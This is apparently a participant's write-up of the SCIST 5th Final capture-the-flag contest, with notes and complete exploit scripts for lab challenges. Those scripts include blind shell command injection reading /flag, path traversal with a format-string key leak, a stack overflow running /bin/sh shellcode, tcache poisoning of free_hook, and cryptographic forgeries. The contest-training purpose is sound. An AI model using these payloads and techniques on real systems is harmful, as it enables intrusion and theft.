SCIST 5th Final CTF

2th
i need more pwn :(
gemini is my god

---

Web

dig-blind2

• command injection+side channel attack brute force

• Exploit

import requests
import string

URL = "http://lab.scist.org:31601/"
TARGET_FILE = "/flag"
PREFIX = "SCIST{"
MAX_LENGTH = 100
punctuation = r"""!"_{}"""
CHARSET = string.ascii_letters + string.digits + punctuation

def test_prefix(prefix):
    injection = f"'; grep -q ^{prefix} {TARGET_FILE} && exit 0 || exit 1 #"
    data = {"name": injection}
    try:
        resp = requests.post(URL, data=data, timeout=5)
        #print(resp.text)
        if "<pre>success</pre>" in resp.text:
            return True
        else:
            return False
    except Exception as e:
        print(f"[!] Request error: {e}")
        return False

def main():
    known = PREFIX
    print(f"Starting brute force with prefix: {known}")

    while True:
        found_char = False
        for c in CHARSET:
            attempt = known + c
            print(f"Trying: {attempt} ... ", end="")
            if test_prefix(attempt):
                print("success")
                known = attempt
                found_char = True
                if c == "}":  
                    print(f"Flag found: {known}")
                    return
                break
            else:
                print("fail")
        if not found_char:
            print("No matching char found, stopping.")
            break
        if len(known) > MAX_LENGTH:
            print("Reached max length, stopping.")
            break

    print(f"Partial flag found: {known}")

if __name__ == "__main__":
    main()

Misc

MIT license

• by how the license() work is prob read the file from __filenames so just patch the __flag into _Printer__filenames

OhYeahmAlwaRe

• app.py
  

• Dockerfile
  

• the route /hacker_image contains lfi so its able to download the OhYeahMalware binary and the flag.txt since it showed in dockerfile

• but the flag is encrypted

• from the IDA decompile showed that prob most of the file is encrypted with AES ECB and the /root/sec.key

• and theres another format string vulnerable that could leak the /root/sec.key

• with version function from app.py we could leak the /root/sec.key then decrypt the flag.txt

• Exploit

import requests
import base64
from Crypto.Cipher import AES
import re
import string

BASE_URL = "http://lab.scist.org:31614"
VERSION_ENDPOINT = f"{BASE_URL}/version"
IMAGE_ENDPOINT = f"{BASE_URL}/hacker_image"

def is_printable(data):
    if not data:
        return False
    printable_count = sum(1 for byte in data if byte in bytes(string.printable, 'ascii'))
    return (printable_count / len(data)) > 0.8

def solve():
    print("[*] Downloading encrypted flag...")
    try:
        traversal_path = "../../../../../home/flag.txt"
        params = {'hacker': traversal_path}
        response = requests.get(IMAGE_ENDPOINT, params=params, timeout=10)
        if response.status_code != 200:
            print(f"[-] Failed to download flag, status code: {response.status_code}")
            return
        encrypted_flag = response.content
        print(f"[+] Encrypted flag downloaded ({len(encrypted_flag)} bytes).")
    except requests.exceptions.RequestException as e:
        print(f"[-] Download error: {e}")
        return

    print("[*] Searching for key in stack and attempting decryption...")
    for i in range(6, 40):
        try:
            payload = f"%{i}$p-%{i+1}$p-%{i+2}$p-%{i+3}$p"
            params = {'author': payload}
            response = requests.get(VERSION_ENDPOINT, params=params, timeout=5)

            if response.status_code != 200:
                continue

            encoded_data = response.json().get("response")
            if not encoded_data:
                continue
            
            decoded_data = base64.b64decode(encoded_data).decode('utf-8', errors='ignore')
            match = re.search(r'Powered by \s*(.*)', decoded_data, re.DOTALL)
            if not match:
                continue

            leaked_string = match.group(1).strip()
            parts = leaked_string.split('-')

            if len(parts) == 4:
                full_key_hex = ""
                for part in parts:
                    if 'nil' in part:
                        hex_val = '0'.zfill(16)
                    else:
                        hex_val = part[2:].zfill(16)
                    full_key_hex += hex_val
                
                potential_key = b''
                for j in range(0, len(full_key_hex), 16):
                    qword_hex = full_key_hex[j:j+16]
                    potential_key += bytes.fromhex(qword_hex)[::-1]

                if len(potential_key) != 32:
                    continue

                cipher = AES.new(potential_key, AES.MODE_ECB)
                decrypted_data = cipher.decrypt(encrypted_flag)
                
                if is_printable(decrypted_data.rstrip(b'\x00')):
                    final_text_bytes = decrypted_data.rstrip(b'\x00')

                    print("\n" + "="*50)
                    print("🎉 Success! Flag decrypted. 🎉")
                    print("="*50)
                    print(f"[*] Key found at offset {i}: {potential_key.hex()}")
                    print("\n--- FLAG ---")
                    print(final_text_bytes.decode('utf-8', errors='ignore').strip())
                    print("------------")
                    return

        except Exception:
            continue

    print("\n[-] Failed to find correct key after all offset attempts.")

if __name__ == "__main__":
    solve()

Reverse

Checker101

• gdb trace
  

Neko Identification System

• it check the image by xor a list and compare it to b list so just xora and b and copy the result to hexeditor to see the image
  

• Exploit

a = [0x54, 0x61, 0x6d, 0x61, 0x6b, 0x69, 0x20, 0x4b, 0x6f, 0x74, 0x61, 0x74, 0x73, 0x75]
b = [0xdd, 0x31, 0x23, 0x26, 0x66, 0x63, 0x3a, 0x41, 0x6f, 0x74, ...............]

I = [hex(b[i] ^ a[i % 14]) for i in range(len(b))]


with open("./image.txt", "w") as f:
    for i in range(len(I)):
        f.write(I[i].removeprefix("0x")+" ")

f.close()

Duel

• in chooseWeapon
  

• theres a hidden weapon and how to trigger it is by 7

• Exploit

from pwn import *

context.log_level = 'DEBUG'

r = remote("lab.scist.org", 31605)

r.sendlineafter("> ", b'7')
r.recvuntil("Start!\n")
r.sendline(b' ')

r.interactive()

not a xor checker

• Encrypt function

__int64 __fastcall encrypt(__int64 a1, __int64 a2)
{
  __int64 v2; // rax
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v5; // rax
  __int64 v6; // rax
  __int64 v7; // rax
  __int64 v8; // rax
  __int64 v9; // rax
  __int64 v10; // rax
  void *v11; // rax
  BYTE *v12; // rax
  __int64 v13; // rax
  __int64 v14; // rax
  __int64 v15; // rax
  _BYTE v17[4]; // [rsp+40h] [rbp-E8h] BYREF
  DWORD pdwDataLen; // [rsp+44h] [rbp-E4h] BYREF
  DWORD dwBufLen; // [rsp+48h] [rbp-E0h]
  HCRYPTHASH phHash; // [rsp+50h] [rbp-D8h] BYREF
  HCRYPTKEY phKey; // [rsp+58h] [rbp-D0h] BYREF
  HCRYPTPROV phProv; // [rsp+60h] [rbp-C8h] BYREF
  DWORD v23; // [rsp+68h] [rbp-C0h]
  DWORD v24; // [rsp+6Ch] [rbp-BCh]
  DWORD v25; // [rsp+70h] [rbp-B8h]
  DWORD v26; // [rsp+74h] [rbp-B4h]
  DWORD LastError; // [rsp+78h] [rbp-B0h]
  size_t Size; // [rsp+80h] [rbp-A8h]
  void *Src; // [rsp+88h] [rbp-A0h]
  __int64 v30; // [rsp+90h] [rbp-98h]
  _BYTE v31[24]; // [rsp+98h] [rbp-90h] BYREF
  _BYTE v32[32]; // [rsp+B0h] [rbp-78h] BYREF
  BYTE v33[32]; // [rsp+D0h] [rbp-58h] BYREF
  BYTE pbData[16]; // [rsp+F0h] [rbp-38h] BYREF
  BYTE v35[16]; // [rsp+100h] [rbp-28h] BYREF

  phProv = 0;
  phKey = 0;
  phHash = 0;
  pbData[0] = -1;
  pbData[1] = -1;
  pbData[2] = -1;
  pbData[3] = -1;
  pbData[4] = -1;
  pbData[5] = -1;
  pbData[6] = -1;
  pbData[7] = -1;
  pbData[8] = -1;
  pbData[9] = -1;
  pbData[10] = -1;
  pbData[11] = -1;
  pbData[12] = -1;
  pbData[13] = -1;
  pbData[14] = -1;
  pbData[15] = -1;
  sub_140004910(v32);
  if ( CryptAcquireContextA(&phProv, 0, 0, 0x18u, 0xF0000000) )
  {
    if ( CryptCreateHash(phProv, 0x800Cu, 0, 0, &phHash) )
    {
      if ( CryptHashData(phHash, pbData, 0x10u, 0) )
      {
        if ( CryptDeriveKey(phProv, 0x660Eu, phHash, 0, &phKey) )
        {
          v35[0] = -18;
          v35[1] = -18;
          v35[2] = -18;
          v35[3] = -18;
          v35[4] = -18;
          v35[5] = -18;
          v35[6] = -18;
          v35[7] = -18;
          v35[8] = -18;
          v35[9] = -18;
          v35[10] = -18;
          v35[11] = -18;
          v35[12] = -18;
          v35[13] = -18;
          v35[14] = -18;
          v35[15] = -18;
          if ( CryptSetKeyParam(phKey, 1u, v35, 0) )
          {
            pdwDataLen = unknown_libname_65(a2);
            dwBufLen = pdwDataLen + 16;
            v10 = unknown_libname_61((__int64)v17);
            sub_140004AD0(v31, dwBufLen, v10);
            Size = pdwDataLen;
            Src = (void *)sub_140008980(a2);
            v11 = (void *)sub_140008B40(v31);
            memcpy(v11, Src, Size);
            v12 = (BYTE *)sub_140008B40(v31);
            if ( CryptEncrypt(phKey, 0, 1, 0, v12, &pdwDataLen, dwBufLen) )
            {
              v30 = 16 * (dwBufLen / 0x10);
              v15 = sub_140008B40(v31);
              unknown_libname_59(v33, v15, v30);
              sub_140005AB0(v32, v33);
              sub_1400055B0((__int64)v33);
            }
            else
            {
              LastError = GetLastError();
              v13 = print((__int64)&qword_140043710, (__int64)"CryptEncrypt failed: ");
              v14 = sub_140005B90(v13, LastError);
              print(v14, (__int64)"\n");
            }
            sub_1400056D0(v31);
          }
        }
        else
        {
          v26 = GetLastError();
          v8 = print((__int64)&qword_140043710, (__int64)"CryptDeriveKey failed: ");
          v9 = sub_140005B90(v8, v26);
          print(v9, (__int64)"\n");
        }
      }
      else
      {
        v25 = GetLastError();
        v6 = print((__int64)&qword_140043710, (__int64)"CryptHashData failed: ");
        v7 = sub_140005B90(v6, v25);
        print(v7, (__int64)"\n");
      }
    }
    else
    {
      v24 = GetLastError();
      v4 = print((__int64)&qword_140043710, (__int64)"CryptCreateHash failed: ");
      v5 = sub_140005B90(v4, v24);
      print(v5, (__int64)"\n");
    }
  }
  else
  {
    v23 = GetLastError();
    v2 = print((__int64)&qword_140043710, (__int64)"CryptAcquireContext failed: ");
    v3 = sub_140005B90(v2, v23);
    print(v3, (__int64)&unk_14002F4A4);
  }
  if ( phHash )
    CryptDestroyHash(phHash);
  if ( phKey )
    CryptDestroyKey(phKey);
  if ( phProv )
    CryptReleaseContext(phProv, 0);
  sub_140004780(a1, v32);
  sub_1400055B0((__int64)v32);
  sub_1400055B0(a2);
  return a1;
}

• all the thing that binary do is AES encrypt the user input and compare with v3 list in flag checker so just decrypt the v3

• Exploit

from Crypto.Cipher import AES
import hashlib


encrypted_flag = bytes([
        0xFB, 0xC3, 0x85, 0xA3, 0x95, 0x54, 0x32, 0xFA,
        0xAB, 0x23, 0xB6, 0x5A, 0xCA, 0x5A, 0x59, 0xF0,
        0xC8, 0x23, 0x3C, 0x62, 0xF7, 0x84, 0x24, 0x15,
        0x01, 0x52, 0xFC, 0x3E, 0x36, 0x44, 0x72, 0xAE
])

data_to_hash = b'\xff' * 16
hasher = hashlib.sha256()
hasher.update(data_to_hash)
key = hasher.digest()[:16]

iv = bytes([0xee] * 16)

cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_padded_flag = cipher.decrypt(encrypted_flag)
padding_len = decrypted_padded_flag[-1]
decrypted_flag = decrypted_padded_flag[:-padding_len]

print(decrypted_flag.decode())

• Flag: SCIST{AES_encrypt_in_CPP0a8c6}

Pwn

Checkin

• simple bof

from pwn import *

context.log_level = 'DEBUG'
context.terminal = ['tmux', 'new-window']

r = remote("lab.scist.org", 31606)

r.sendlineafter("?", b'a' * 32 + b'a' * 8 + p64(0x40195d))

r.interactive()

Return to shellcode 2015

• fget 24 bytes and 16 bytes to hijack return address
  
  

• since the size of the fget is not enough for the shellcode to get shell so we make a read shellcode that can read more bytes

• Exploit

from pwn import *

context.arch = "amd64"
context.log_level = 'DEBUG'
context.terminal = ['tmux', 'new-window']

# r = process("./chal")
r = remote("lab.scist.org", 31607)

jmp_rax = p64(0x00000000004010ac)

shellcode_read = asm('''
    mov rsi, rax
    nop
    and rdi,0
    nop
    xor rax, rax
    mov dl, 0x30
    syscall
''')

shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'

r.send(shellcode_read.rjust(16, b'\x90') + jmp_rax + p16(0) + p8(0))
r.sendline(b'\x90' * 20 + shellcode)

r.interactive()

Zero to hero - Nerf version 2

• source code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>

#define MAX_BIN 8

void menu() {
  puts("1. Get a superpower");
  puts("2. Remove a superpower");
  puts("3. Print a superpower");
  puts("4. Update a superpower");
  puts("5. Exit");
}

char *bins[MAX_BIN] = {0};
uint32_t len[MAX_BIN] = {0};

int get_total_len() {
  for (int i = 0; i < MAX_BIN; ++i) {
    if (!bins[i]) return i;
  }
  return -1;
}

void add_power() {
  int index = get_total_len();
  if (index < 0) {
    puts("You have too many powers!");
    exit(-1);
  }
  puts("Describe your new power.");
  puts("What is the length of your description?");
  printf("> ");
  unsigned int size = 0;
  scanf("%u", &size);
  getchar();
  bins[index] = (char *)malloc(size);
  if (bins[index] == NULL) {
    perror("malloc");
    exit(-1);
  }
  len[index] = size;
  puts("Enter your description: ");
  printf("> ");
  fgets(bins[index], size, stdin);
  puts("Done!");
}

void remove_power() {
  int index = 0;
  puts("Which power would you like to remove?");
  printf("> ");
  scanf("%d", &index);
  getchar();
  if (index >= MAX_BIN || index < 0) {
    puts("Invalid index!");
    exit(-1);
  }
  if (bins[index] == NULL) {
    puts("You don't have that power!");
    exit(-1);
  }
  free(bins[index]);
  // bins[index] = NULL; // vulnerability here
  // len[index] = 0;
  puts("Done!");
}

void print_power() {
  int index = -1;
  puts("Which power would you like to see?");
  printf("> ");
  scanf("%d", &index);
  getchar();
  if (index >= MAX_BIN || index < 0) {
    puts("Invalid index!");
    exit(-1);
  }
  if (bins[index] == NULL) {
    puts("You don't have that power!");
    exit(-1);
  }
  printf("Your superpower is: %s\n", bins[index]);
}

void update_power() {
  int index = -1;
  puts("Which power would you like to update?");
  printf("> ");
  scanf("%d", &index);
  getchar();
  if (index >= MAX_BIN || index < 0) {
    puts("Invalid index!");
    exit(-1);
  }
  if (bins[index] == NULL) {
    puts("You don't have that power!");
    exit(-1);
  }
  puts("Enter your new description: ");
  printf("> ");
  fgets(bins[index], len[index], stdin);
  puts("Updated!");
}

int main(int argc, char **argv) {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  puts("From Zero to Hero - Nerf Version 2");
  puts("So, you wanna be a hero?");
  char opt[2];
  read(0, opt, 2);
  if (opt[0] == 'y') {
    puts("Really? Being a hero is hard.");
    puts("Fine. I see I can't convince you otherwise.");
  } else {
    puts("No? Then why are you even here?");
    exit(0);
  }

  while (1) {
    menu();
    printf("> ");
    int choice;
    scanf("%d", &choice);
    getchar();
    switch (choice) {
      case 1:
        add_power();
        break;
      case 2:
        remove_power();
        break;
      case 3:
        print_power();
        break;
      case 4:
        update_power();
        break;
      case 5:
        puts("Giving up?");
        exit(0);
      default:
        puts("Invalid choice. You are not a hero.");
        break;
    }
  }
  return 0;
}

• from the these function we can control the malloc size and free and edit the chunk content

• the attack strategy
  create unsorted bin to leak libc address >> tcache posioning >> control free hook >> one_gadget

• exploit

from pwn import *

context.log_level = 'DEBUG'
context.terminal = ['tmux', 'new-window']

# r = process("./chal")
r = remote("lab.scist.org", 31608)

r.sendlineafter("?", b'y')

def malloc(size, content):
    r.sendlineafter("> ", b'1')
    r.sendlineafter("> ", str(size).encode())
    r.sendlineafter("> ", content)

def free(index):
    r.sendlineafter("> ", b'2')
    r.sendlineafter("> ", str(index).encode())

def leak(index):
    r.sendlineafter("> ", b'3')
    r.sendlineafter("> ", str(index).encode())

def edit(index, content):
    r.sendlineafter("> ", b'4')
    r.sendlineafter("> ", str(index).encode())
    r.sendlineafter("> ", content)

leakoffset = 0x1ecbe0
mallochook = 0x1ecb70
freehook = 0x1eee48
afterhook = 0x1eee40

# leak libc address
malloc(1280, b'0')
malloc(100, b'1')
free(0)
leak(0)
r.recvuntil(": ")
libcbase = int(str(u64(r.recv(6) + b'\x00\x00'))) - leakoffset
print(hex(libcbase))

# tcache poisoning
malloc(100, b'2')
free(2)
free(1)
edit(1, p64(libcbase + freehook))
malloc(100, b'3')
malloc(100, p64(libcbase + 0xe3b01))
free(0)

r.interactive()

Crypto

owo

• exploit

##!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
import math

def get_outputs_from_server(n):
    """
    Connects to the server and retrieves 'n' consecutive LCG states.
    """
    # Establish connection to the server
    conn = remote('lab.scist.org', 31611)
    
    outputs = []
    # Payload 'ff...ff' makes the user-controlled part of the XOR zero
    payload = b'ff' * 64 
    
    for i in range(n):
        log.info(f"Retrieving LCG state {i+1}/{n}...")
        conn.recvuntil(b'> ')
        conn.sendline(payload)
        response = conn.recvline().strip() # e.g., b'oWo = deadbeef...'
        hex_output = response.split(b' = ')[1]
        # Convert hex output to integer and store it
        outputs.append(bytes_to_long(bytes.fromhex(hex_output.decode())))
        
    conn.close()
    log.success("Retrieved all LCG states.")
    return outputs

def solve():
    """
    Solves the crypto challenge to recover the flag.
    """
    # Phase 1: Get 5 consecutive LCG states
    try:
        y = get_outputs_from_server(5)
        y1, y2, y3, y4, y5 = y
    except Exception as e:
        log.failure(f"Failed to connect or interact with the server: {e}")
        log.failure("Please ensure the server is running and accessible.")
        return None

    log.info("Calculating LCG parameters...")
    # Phase 2: Recover LCG parameters
    t0 = y2 - y1
    t1 = y3 - y2
    t2 = y4 - y3
    t3 = y5 - y4
    
    M1 = abs(t1**2 - t0 * t2)
    M2 = abs(t2**2 - t1 * t3)
    
    # Find the modulus 'owo'
    owo = math.gcd(M1, M2)
    log.success(f"Recovered modulus (owo)")
    
    # Find the multiplier 'OwO'
    try:
        if t0 % owo != 0:
            OwO = (t1 * pow(t0, -1, owo)) % owo
        elif t1 % owo != 0: # Fallback if t0 is a multiple of owo
            OwO = (t2 * pow(t1, -1, owo)) % owo
        else:
            log.failure("Error: Could not determine LCG multiplier.")
            return None
        log.success(f"Recovered multiplier (OwO)")
    except ValueError:
        log.failure("Failed to compute modular inverse.")
        return None

    # Find the increment 'OWO'
    OWO = (OwO * y1 - y2) % owo
    log.success(f"Recovered increment term (OWO)")
    
    # Phase 3: Reverse the LCG to find the flag
    log.info("Reversing the LCG to find the initial seed (flag)...")
    # Our first retrieved state was y1 = Owo_101. We need to go back 101 steps.
    OwO_inv = pow(OwO, -1, owo)
    
    current_Owo = y1
    for i in range(101):
        current_Owo = (OwO_inv * (current_Owo + OWO)) % owo
        
    log.success("Initial seed recovered!")
    
    # Convert the final integer back to the flag string
    flag_long = current_Owo
    flag_bytes = long_to_bytes(flag_long)
    
    try:
        flag = flag_bytes.decode('utf-8')
        return flag
    except UnicodeDecodeError:
        log.failure(f"Could not decode flag bytes: {flag_bytes}")
        return None

if __name__ == '__main__':
    flag = solve()
    if flag:
        log.success(f"Flag: {flag}")

Yoshino’s Secret Plus

• exploit

##!/usr/bin/python3
from pwn import *

# Connection details
HOST = 'lab.scist.org'
PORT = 31609

# Establish connection
r = remote(HOST, PORT)

# --- Initial Setup ---
# Receive the initial token from the server
r.recvuntil(b'token: ')
initial_token_hex = r.recvline().strip().decode()
initial_token = bytearray.fromhex(initial_token_hex)

log.success(f"Got initial token: {initial_token_hex[:32]}...")

# --- Main Attack Loop ---
while True:
    try:
        # Wait for and parse the next OTP from the server
        r.recvuntil(b'OTP: ')
        new_otp = int(r.recvline().strip())
        log.info(f"Received new OTP: {new_otp}")
        
        # Prepare a mutable copy of the token for this round's modification
        modified_token = initial_token[:]
        
        # Original and new OTP values as byte strings
        original_otp_str = b'12345678'
        new_otp_str = f'{new_otp:08d}'.encode()

        # 1. Modify the IV to change the OTP value in the first plaintext block.
        # This flip affects token bytes 4 through 11.
        for i in range(8):
            modified_token[4 + i] ^= original_otp_str[i] ^ new_otp_str[i]
            
        # 2. Modify the correct ciphertext byte to flip the admin flag.
        # CORRECTED: The '0' in 'admin=0' is at plaintext index 55.
        # This requires flipping the byte at absolute token index 55.
        admin_flip_index = 55
        modified_token[admin_flip_index] ^= ord('0') ^ ord('1')

        log.info("Sending modified token...")
        # Send the crafted token back, waiting for the prompt first
        r.sendlineafter(b'token > ', modified_token.hex().encode())
        
        # Read the server's response line by line
        response = r.recvline()
        
        # Check if we got the flag!
        if b'FLAG' in response or b'flag' in response:
            log.success("Flag found!")
            print(response.decode())
            # Print any remaining output from the server
            print(r.recvall(timeout=1).decode())
            break
        else:
            # If no flag, print the non-permission response and loop for the next OTP
            log.warning(f"Server response: {response.decode().strip()}")

    except EOFError:
        log.error("Connection closed by server.")
        break
    except Exception as e:
        log.error(f"An error occurred: {e}")
        break

r.close()

RSA SigSig

• exploit

##!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import bytes_to_long
import math
import sys

def solve():
    # Connect to the remote server
    # r = remote('localhost', 1337) # for local testing
    r = remote('lab.scist.org', 31613)

    try:
        # --- Step 1: Get values from get_example() ---
        r.recvuntil(b'pkey = ')
        pkey_ex = int(r.recvline().strip())
        r.recvuntil(b'skey = ')
        skey_ex = int(r.recvline().strip())
        r.recvuntil(b'n = ')
        n = int(r.recvline().strip())

        # --- Step 2: Calculate a multiple of phi(n) ---
        half = skey_ex.bit_length() // 2
        left_part = skey_ex >> half
        right_part = skey_ex & ((1 << half) - 1)
        exponent_ex = left_part * right_part
        M = pkey_ex * exponent_ex - 1
        
        # --- Step 3: Attempt to get the flag ---
        r.recvuntil(b'pkey = ')
        pkey_chal = int(r.recvline().strip())
        log.info(f"Challenge pkey: {pkey_chal}")
        
        # Check if pkey_chal is invertible before trying to calculate
        if math.gcd(pkey_chal, M) != 1:
            log.warning("pkey_chal and M are not coprime. This attempt will fail.")
            # We know the server will disconnect, so just close gracefully.
            r.close()
            return False

        # --- Step 4: Forge the signature ---
        d = pow(pkey_chal, -1, M)
        message = b'give_me_flag'
        m_long = bytes_to_long(message)
        C = m_long ^ pkey_chal
        signature = pow(C, d, n)
        
        log.info(f"Forged signature: {signature}")
        r.sendlineafter(b'signature : ', str(signature).encode())
        
        response = r.recvall(timeout=2)
        if b'FLAG' in response:
            log.success("Flag obtained!")
            print(response.decode())
            return True
        else:
            log.warning("Signature failed on server.")
            return False

    except (EOFError, ValueError) as e:
        log.error(f"An error occurred: {e}")
        r.close()
        return False
    finally:
        if r.connected():
            r.close()

if __name__ == '__main__':
    attempts = 0
    while True:
        attempts += 1
        log.info(f"Starting attempt #{attempts}...")
        if solve():
            break
        time.sleep(1) # Wait a second before reconnecting

dsaaaaaaaaaaaaaaaaa

#!/usr/bin/env python3
from pwn import *
from hashlib import sha1
from Crypto.Util.number import bytes_to_long
from random import randint

# SHA1 hash function as defined in the script
def H(m):
    return bytes_to_long(sha1(m).digest())

def solve():
    # Connect to the remote service
    conn = remote('lab.scist.org', 31612)

    # 1. Parse public parameters from the server output
    conn.recvuntil(b'p = ')
    p = int(conn.recvline().strip())
    conn.recvuntil(b'q = ')
    q = int(conn.recvline().strip())
    conn.recvuntil(b'g = ')
    g = int(conn.recvline().strip())
    conn.recvuntil(b'y = ')
    y = int(conn.recvline().strip())
    log.info("Public parameters received.")

    # Message to get signed by the oracle
    msg_to_sign = b'AyachiNene'
    msg_choice = b'a'
    H_m = H(msg_to_sign)

    # 2. Obtain the two required signatures (for t=0 and t=3)
    r0, s0, r3, s3 = 0, 0, 0, 0
    for i in range(4):
        conn.recvuntil(b'> ')
        conn.sendline(b'e')  # Choose [E]xample
        conn.recvuntil(b'> ')
        conn.sendline(msg_choice) # Choose message 'a'
        
        conn.recvuntil(b'r = ')
        r_curr = int(conn.recvline().strip())
        conn.recvuntil(b's = ')
        s_curr = int(conn.recvline().strip())
        
        if i == 0:
            r0, s0 = r_curr, s_curr
            log.info(f"Got signature for t=0: (r={r0}, s={s0})")
        elif i == 3:
            r3, s3 = r_curr, s_curr
            log.info(f"Got signature for t=3: (r={r3}, s={s3})")

    # 3. Calculate the private key x
    log.info("Calculating private key 'x'...")
    num = -H_m * (s0 + s3)
    den = (s3 * r0 + s0 * r3)
    x = (num * pow(den, -1, q)) % q
    log.success(f"Private key recovered: x = {x}")

    # Verify the key (optional, but good practice)
    assert pow(g, x, p) == y
    log.success("Private key confirmed to be correct.")

    # 4. Forge a signature for 'GET_FLAG'
    log.info("Forging signature for 'GET_FLAG'...")
    msg_flag = b'GET_FLAG'
    H_flag = H(msg_flag)
    
    # Generate signature until r and s are non-zero
    while True:
        k_forge = randint(1, q - 1)
        r_flag = pow(g, k_forge, p) % q
        if r_flag == 0: continue
        
        s_flag = (pow(k_forge, -1, q) * (H_flag + x * r_flag)) % q
        if s_flag == 0: continue
        
        break
    log.success("Signature forged successfully.")

    # 5. Send the forged signature to get the flag
    conn.recvuntil(b'> ')
    conn.sendline(b'g') # Choose [G]et FLAG
    conn.recvuntil(b'r: ')
    conn.sendline(str(r_flag).encode())
    conn.recvuntil(b's: ')
    conn.sendline(str(s_flag).encode())

    # Receive and print the flag
    response = conn.recvall()
    print(response.decode())
    
    conn.close()

if __name__ == '__main__':
    solve()